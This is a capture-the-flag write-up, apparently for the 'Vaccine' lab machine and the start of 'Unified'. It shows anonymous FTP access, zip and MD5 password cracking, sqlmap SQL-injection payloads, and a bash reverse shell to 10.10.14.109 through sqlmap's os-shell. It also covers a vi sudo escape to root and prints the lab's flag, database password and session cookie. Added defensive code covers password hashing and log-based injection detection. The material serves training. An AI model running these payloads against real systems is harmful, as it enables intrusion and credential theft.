Host is up (0.0035s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.5.22
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.5.22:80/
| Form id: login__username
|_ Form action:
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set

Nmap done: 1 IP address (1 host up) scanned in 32.32 seconds

Anonymous FTP login

Nmap's ftp-anon script already reported anonymous access, so log in and fetch what is there.

┌──(i3eg1nner㉿minilite)-[~]
└─$ ftp 10.129.5.22
Connected to 10.129.5.22.
220 (vsFTPd 3.0.3)
Name (10.129.5.22:i3eg1nner): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10107|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10016|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |*****************************************************************************************************************************************************************| 2533 1.58 MiB/s 00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (429.74 KiB/s)

Login works and there is a single file, backup.zip. Rather than extract an unknown archive blindly, list its contents first with unzip -l.

┌──(i3eg1nner㉿minilite)-[~]
└─$ unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
2594 2020-02-03 05:57 index.php
3274 2020-02-03 14:04 style.css
--------- -------
5868 2 files

Two small web files, nothing alarming, so extract it.

┌──(i3eg1nner㉿minilite)-[~]
└─$ unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
skipping: index.php incorrect password
skipping: style.css incorrect password

Cracking the zip password with John

The archive is password-protected, so try cracking it. First convert the archive with zip2john into a hash that John the Ripper understands, then run john against that hash.

┌──(i3eg1nner㉿minilite)-[~]
└─$ zip2john backup.zip > hashes.txt
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(i3eg1nner㉿minilite)-[~]
└─$ cat hashes.txt
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*…*$/pkzip$::backup.zip:style.css, index.php:backup.zip

The cracking run itself (john against the hash file with a wordlist) is not captured here. Once john has cracked a hash it records the result in its pot file and a repeated run prints nothing, so use --show to display it. Make sure the file name matches what you actually wrote: the transcript writes hashes.txt from zip2john but passes hash.txt to --show.

┌──(i3eg1nner㉿minilite)-[~]
└─$ john --show hash.txt
backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

1 password hash cracked, 0 left

Extract with the recovered password and examine the files; the PHP file is the interesting one.

┌──(i3eg1nner㉿minilite)-[~]
└─$ cat index.php
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>

The key lines contain the hard-coded login: username admin and an unsalted MD5 of the password compared with ===. An unsalted, fast hash of a short password is trivially reversed with an online lookup table or a wordlist, which is how the password was recovered here.
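What the online lookup does, and what the login code should have done instead, as an added example that is not from the page: a wordlist MD5 search against the hash from index.php, beside a salted PBKDF2 scheme with constant-time comparison for contrast. The candidate list is constructed; a real run would read rockyou.txt or similar through crack_md5_from_file.

```python
"""MD5 wordlist lookup and a hardened password scheme. Added example."""
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# The hash the page's index.php compares against: md5($_POST['password']) === "..."
TARGET_HASH = "2cb42f8734ea607eefed3b70af13bbd3"

# Constructed stand-in for a real wordlist such as rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "letmein", "admin123", "qwerty789", "Passw0rd"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def crack_md5(target: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 equals target, or None.
    Works because the hash is unsalted and MD5 is fast: every guess costs
    one hash and the same hash matches for every user with that password."""
    target = target.strip().lower()
    for cand in candidates:
        cand = cand.rstrip("\r\n")
        if md5_hex(cand) == target:
            return cand
    return None


def crack_md5_from_file(target: str, wordlist_path: str) -> Optional[str]:
    """Stream a wordlist from disk (one candidate per line) into crack_md5."""
    with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as fh:
        return crack_md5(target, fh)


# What the login should have used: a per-user random salt and a deliberately
# slow KDF, so a stolen hash cannot be looked up and each guess is expensive.
def hash_password(password: str, salt: Optional[bytes] = None,
                  rounds: int = 200_000) -> Tuple[bytes, bytes]:
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return salt, dk


def verify_password(password: str, salt: bytes, expected: bytes,
                    rounds: int = 200_000) -> bool:
    _, dk = hash_password(password, salt, rounds)
    return hmac.compare_digest(dk, expected)  # constant-time, unlike ===


if __name__ == "__main__":
    print("recovered:", crack_md5(TARGET_HASH, SAMPLE_WORDLIST))
    salt, dk = hash_password("example")
    print("verify:", verify_password("example", salt, dk))
```

The PHP equivalent of the hardened half is password_hash() and password_verify(); the point of the contrast is that the page's check would have been safe against exactly this lookup with a salt and a slow hash.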

Next, the web interface: it is a login page, and the recovered credentials work. The dashboard has a search box, a classic place for SQL injection, so run sqlmap against the search parameter, passing the session cookie so the requests are authenticated.

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u 'http://10.129.112.231/dashboard.php?search=any+query' --cookie="PHPSESSID=sg30eek98th94d529cq6u1e1jk"
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:00:33 /2023-06-05/

[04:00:33] [INFO] testing connection to the target URL
[04:00:33] [INFO] testing if the target URL content is stable
[04:00:33] [INFO] target URL content is stable
[04:00:33] [INFO] testing if GET parameter 'search' is dynamic
[04:00:33] [WARNING] GET parameter 'search' does not appear to be dynamic
[04:00:33] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[04:00:34] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] y
[04:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:00:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:00:41] [INFO] testing 'Generic inline queries'
[04:00:41] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[04:00:41] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[04:00:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[04:00:41] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[04:00:41] [INFO] testing 'PostgreSQL inline queries'
[04:00:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:00:41] [WARNING] time-based comparison requires larger statistical model, please wait..... (done)
[04:00:51] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[04:00:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:01:01] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[04:01:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (6152=6152) THEN NULL ELSE CAST((CHR(69)||CHR(68)||CHR(79)||CHR(71)) AS NUMERIC) END)) IS NULL-- XHCU

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 7041=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (7041=7041) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- PNrW

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 1699=(SELECT 1699 FROM PG_SLEEP(5))-- mmIq
---
[04:01:04] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[04:01:04] [INFO] fetched data logged to text files under '/home/i3eg1nner/.local/share/sqlmap/output/10.129.112.231'

[*] ending @ 04:01:04 /2023-06-05/

"GET parameter 'search' is vulnerable" confirms the injection: sqlmap found boolean-based, error-based, time-based and stacked-query injection against PostgreSQL. Stacked queries combined with a privileged database account are what turn an injection into command execution, so try --os-shell.

SQL injection to command execution

┌──(i3eg1nner㉿minilite)-[~]
└─$ sqlmap -u 'http://10.129.112.231/dashboard.php?search=any+query' --cookie="PHPSESSID=sg30eek98th94d529cq6u1e1jk" --os-shell
___
__H__
___ ___[']_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:02:17 /2023-06-05/

[04:02:17] [INFO] resuming back-end DBMS 'postgresql'
[04:02:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (6152=6152) THEN NULL ELSE CAST((CHR(69)||CHR(68)||CHR(79)||CHR(71)) AS NUMERIC) END)) IS NULL-- XHCU

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 7041=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (7041=7041) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- PNrW

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 1699=(SELECT 1699 FROM PG_SLEEP(5))-- mmIq
---
[04:02:17] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[04:02:17] [INFO] fingerprinting the back-end DBMS operating system
[04:02:17] [INFO] the back-end DBMS operating system is Linux
[04:02:17] [INFO] testing if current user is DBA
[04:02:17] [INFO] retrieved: '1'
[04:02:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[04:02:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.109/443 0>&1"
do you want to retrieve the command standard output? [Y/n/a] y
[04:05:12] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[04:06:42] [CRITICAL] connection timed out to the target URL
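Detection logic for the traffic above, as an added example that is not part of the write-up: it parses Apache combined-format access log lines, percent-decodes the request, and flags the PostgreSQL indicators that appear in sqlmap's payloads (PG_SLEEP, CHR()||, CAST(... AS NUMERIC), stacked queries) and in the COPY ... FROM PROGRAM path used by --os-shell. The log lines are constructed from the payloads sqlmap printed; the user-agent strings, timestamps and the cmd_exec table name are assumptions.

```python
"""Flag PostgreSQL injection indicators in Apache access logs. Added example;
the log lines below are constructed from the payloads on the page."""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import quote_plus, unquote_plus

# Case-insensitive because PostgreSQL identifiers and keywords are.
INDICATORS = {
    "pg_sleep": re.compile(r"pg_sleep\s*\(", re.I),
    "chr_concat": re.compile(r"chr\(\d+\)\s*\|\|", re.I),
    "cast_numeric": re.compile(r"cast\s*\(.+?as\s+numeric\)", re.I | re.S),
    "stacked_query": re.compile(r"'\s*;\s*(select|copy|create|drop|insert|update|delete)\b", re.I),
    "copy_from_program": re.compile(r"copy\s+\S+\s+from\s+program", re.I),
    "sqlmap_ua": re.compile(r"sqlmap", re.I),
}

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)


def decode_request(url: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads do not slip past."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def scan_line(line: str) -> Optional[Dict]:
    """Return a finding for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_request(m.group("url"))
    hits = {name for name, rx in INDICATORS.items()
            if name != "sqlmap_ua" and rx.search(decoded)}
    if INDICATORS["sqlmap_ua"].search(m.group("ua")):
        hits.add("sqlmap_ua")
    if not hits:
        return None
    return {"ip": m.group("ip"), "url": decoded, "ua": m.group("ua"),
            "indicators": sorted(hits)}


def scan_log(lines: Iterable[str]) -> List[Dict]:
    findings = []
    for line_no, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit:
            hit["line_no"] = line_no
            findings.append(hit)
    return findings


def _req(query: str, ua: str) -> str:
    """Constructed combined-format log line for a dashboard search."""
    return (f'10.10.14.109 - - [05/Jun/2023:04:00:41 -0400] '
            f'"GET /dashboard.php?search={quote_plus(query)} HTTP/1.1" 200 2048 '
            f'"http://10.129.112.231/dashboard.php" "{ua}"')


BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/102.0"   # assumed UA
SQLMAP = "sqlmap/1.7.2#stable (https://sqlmap.org)"          # assumed UA

SAMPLE_LOG = [
    _req("Elixir", BROWSER),
    _req("any query' AND 1699=(SELECT 1699 FROM PG_SLEEP(5))-- mmIq", SQLMAP),
    _req("any query';SELECT PG_SLEEP(5)--", SQLMAP),
    _req("any query' AND 7041=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113))||"
         "(SELECT (CASE WHEN (7041=7041) THEN 1 ELSE 0 END))::text||"
         "(CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)) AS NUMERIC)-- PNrW", SQLMAP),
    _req("x';COPY cmd_exec FROM PROGRAM 'id'--", BROWSER),  # table name assumed
    _req("O'Reilly", BROWSER),  # a legitimate apostrophe must not fire
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["line_no"], f["indicators"], f["url"][:60])
```

The last sample line matters as much as the others: an apostrophe alone is not an indicator, which keeps searches for names like O'Reilly out of the alert queue. In a real deployment the patterns would be fed from the decoded request body too, since the same payloads arrive in POST parameters.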

sqlmap first checked that the database user is a superuser (retrieved: '1') and then used PostgreSQL's COPY ... FROM PROGRAM to execute commands, which run as the postgres OS user. The bash reverse-shell one-liner never returns to sqlmap, hence the timeouts it reports, but the listener catches the connection.

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for i3eg1nner:
listening on [any] 443 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.112.231] 37922
bash: cannot set terminal process group (1797): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami
whoami
postgres
postgres@vaccine:/var/lib/postgresql/11/main$ pwd
pwd
/var/lib/postgresql/11/main
postgres@vaccine:/var/lib/postgresql/11/main$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:f6:4f brd ff:ff:ff:ff:ff:ff
inet 10.129.112.231/16 brd 10.129.255.255 scope global dynamic ens160
valid_lft 2215sec preferred_lft 2215sec
inet6 dead:beef::250:56ff:feb9:f64f/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb9:f64f/64 scope link
valid_lft forever preferred_lft forever
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
postgres@vaccine:/var/lib/postgresql/11/main$ which python
which python
postgres@vaccine:/var/lib/postgresql/11/main$ which python3
which python3
/usr/bin/python3
postgres@vaccine:/var/lib/postgresql/11/main$ python3 -c "import pty;pty.spawn('/bin/bash')"
<ain$ python3 -c "import pty;pty.spawn('/bin/bash')"
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
sudo -l
[sudo] password for postgres:

Sorry, try again.
[sudo] password for postgres:

Sorry, try again.
[sudo] password for postgres:

sudo: 3 incorrect password attempts

Post-shell information gathering

Basic enumeration of the postgres home directory yields user.txt.

postgres@vaccine:/var/lib/postgresql/11/main$ cd ..
cd ..
postgres@vaccine:/var/lib/postgresql/11$ ls
ls
main
postgres@vaccine:/var/lib/postgresql/11$ cd ..
cd ..
postgres@vaccine:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7

dashboard.php under /var/www/html also contains a database password:

session_start(); if($_SESSION['login'] !== "true") { header("Location: index.php"); die(); } try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }

It is a database password, but reuse is common, and the connection string authenticates as postgres, the same account we are running as at the OS level. So try it against sudo -l.

postgres@vaccine:/var/lib/postgresql$ sudo -l
sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass

User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:/var/lib/postgresql$ sudo vi -c ':!/bin/sh' /dev/null
sudo vi -c ':!/bin/sh' /dev/null
Sorry, user postgres is not allowed to execute '/usr/bin/vi -c :!/bin/sh /dev/null' as root on vaccine.

Privilege escalation through vi

postgres may run vi as root, but only on /etc/postgresql/11/main/pg_hba.conf. The GTFOBins one-liner with -c is refused because sudoers matches the full argument list, so only that exact command line is permitted. It makes no difference: once vi is open on the allowed file, its own :shell command spawns a shell, and that shell is root. The usual mitigations are to grant sudoedit instead (it edits a copy as the calling user) or to add NOEXEC to the sudoers rule, since vi is one of many editors that can execute commands.

vi
:set shell=/bin/sh
:shell

Success: a root shell.

:shell
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt

Unified

Information gathering

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.227.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 05:14 EDT
Warning: 10.129.227.191 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.191
Host is up (0.13s latency).
Not shown: 64714 closed tcp ports (reset), 815 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
6789/tcp open ibm-db2-admin
8080/tcp open http-proxy
8443/tcp open https-alt
8843/tcp open unknown
8880/tcp open cddbp-alt

Nmap done: 1 IP address (1 host up) scanned in 28.88 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,6789,8080,8443,8843,8880 10.129.227.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 05:15 EDT
Nmap scan report for 10.129.227.191
Host is up (0.0041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://10.129.227.191:8443/manage
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 05 Jun 2023 09:15:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p { font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
| Found</h1></body></html>
| GetRequest, HTTPOptions:
| HTTP/1.1 302
| Location: http://localhost:8080/manage
| Content-Length: 0
| Date: Mon, 05 Jun 2023 09:15:12 GMT
| Connection: close
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 05 Jun 2023 09:15:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
8443/tcp open ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
8843/tcp open ssl/unknown
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after: 2024-04-03T21:37:24
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 05 Jun 2023 09:15:29 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
8880/tcp open cddbp-alt?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 431
| Date: Mon, 05 Jun 2023 09:15:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p { font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
| Found</h1></body></html>
| GetRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 05 Jun 2023 09:15:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
| Request</h1></body></html>
| HTTPOptions:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 05 Jun 2023 09:15:17 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.93%I=7%D=6/5%Time=647DA79F%P=x86_64-pc-linux-gnu%r(Get
SF:Request,84,"HTTP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/
SF:manage\r\nContent-Length:\x200\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2
SF:009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,84,"HT
SF:TP/1\.1\x20302\x20\r\nLocation:\x20http://localhost:8080/manage\r\nCont
SF:ent-Length:\x200\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x2009:15:12\x20G
SF:MT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x2040
SF:0\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\
SF:x20en\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2005\x20Jun\x202023\x
SF:2009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><htm
SF:l\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20
SF:Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-family:
SF:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;bac
SF:kground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:
SF:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{co
SF:lor:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:no
SF:ne;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20B
SF:ad\x20Request</h1></body></html>")%r(FourOhFourRequest,24A,"HTTP/1\.1\x
SF:20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Langua
SF:ge:\x20en\r\nContent-Length:\x20431\r\nDate:\x20Mon,\x2005\x20Jun\x2020
SF:23\x2009:15:12\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>
SF:<html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x20\xe2\x80\x93
SF:\x20Not\x20Found</title><style\x20type=\"text/css\">body\x20{font-famil
SF:y:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;b
SF:ackground-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-siz
SF:e:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{
SF:color:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:
SF:none;}</style></head><body><h1>HTTP\x20Status\x20404\x20\xe2\x80\x93\x2
SF:0Not\x20Found</h1></body></html>")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r
